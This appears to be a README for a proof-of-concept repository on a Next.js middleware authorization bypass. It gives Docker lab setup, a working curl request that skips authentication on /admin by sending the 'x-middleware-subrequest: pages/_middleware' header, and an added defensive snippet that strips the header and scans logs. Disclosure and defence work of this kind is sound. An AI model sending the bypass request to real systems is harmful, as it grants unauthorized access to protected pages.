This repository demonstrates a critical vulnerability in Next.js middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. The vulnerability allows authorization bypass, CSP bypass, and potential DoS through cache poisoning. The issue originates in the way the `x-middleware-subrequest` header is handled, which lets attackers bypass the protection mechanisms implemented in middleware.

This proof of concept is specific to the vulnerability in Next.js v12.
Set up the vulnerable environment using Docker and the files from this repo by running:

```shell
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```

This repository already includes the `exploit.sh` script to test exploitation of the vulnerability. To test it, run:

```shell
chmod +x exploit.sh
./exploit.sh
```

Additionally, you can test exploitation of the vulnerability manually by trying the following:

- Request the admin page without authentication. You should get a redirection to the login page.

  ```shell
  curl -i http://localhost:3000/admin
  ```

- Request the page without authentication but with the `x-middleware-subrequest` header. You should be able to bypass the authentication page.

  ```shell
  curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
  ```

- CVE-2025-29927: Security Advisory Link
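As an added, defender-side example (not code from this repository or from Next.js): deployments that cannot upgrade should make sure no external request reaches the application with `x-middleware-subrequest` set, so the snippet strips that header at a trusted reverse proxy and scans access-log records for requests that carried it. The function names and the JSON log format are assumptions, and the log entries are constructed to mirror the two `curl` requests above.

```javascript
// Added example, not part of the l1uk/nextjs-middleware-exploit repo or Next.js.
// The affected versions treat a request carrying x-middleware-subrequest as an
// internal subrequest and skip middleware, so the trusted edge must drop it.
const SUBREQUEST_HEADER = "x-middleware-subrequest";

// Remove the header from an inbound request (HTTP header names are
// case-insensitive) and report the value the client tried to send.
function stripSubrequestHeader(headers) {
  const cleaned = {};
  let stripped = null;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === SUBREQUEST_HEADER) {
      stripped = String(value); // keep it for logging / alerting
      continue;                 // but never forward it to Next.js
    }
    cleaned[name] = value;
  }
  return { headers: cleaned, stripped };
}

// Detection over access-log records (constructed format: one JSON object per
// line with ip, method, path, status and a `headers` map). Any record with the
// header is an attempt; a 200 on a protected path means the bypass worked.
function findBypassAttempts(logLines, protectedPrefixes = ["/admin"]) {
  const hits = [];
  for (const line of logLines) {
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip malformed lines
    const hdrs = rec.headers || {};
    const key = Object.keys(hdrs).find((k) => k.toLowerCase() === SUBREQUEST_HEADER);
    if (!key) continue;
    const onProtected = protectedPrefixes.some((p) => rec.path.startsWith(p));
    hits.push({ ip: rec.ip, path: rec.path, value: hdrs[key],
                succeeded: onProtected && rec.status === 200 });
  }
  return hits;
}

// Constructed sample log: the redirected visit, the PoC request, and noise.
const SAMPLE_LOG = [
  JSON.stringify({ ip: "203.0.113.5", method: "GET", path: "/admin", status: 302, headers: {} }),
  JSON.stringify({ ip: "203.0.113.5", method: "GET", path: "/admin", status: 200,
                   headers: { "X-Middleware-Subrequest": "pages/_middleware" } }),
  JSON.stringify({ ip: "198.51.100.9", method: "GET", path: "/", status: 200,
                   headers: { host: "localhost:3000" } }),
];
```

Wiring `stripSubrequestHeader` into the proxy only helps if the proxy is the sole path to the application; direct access to port 3000 bypasses it.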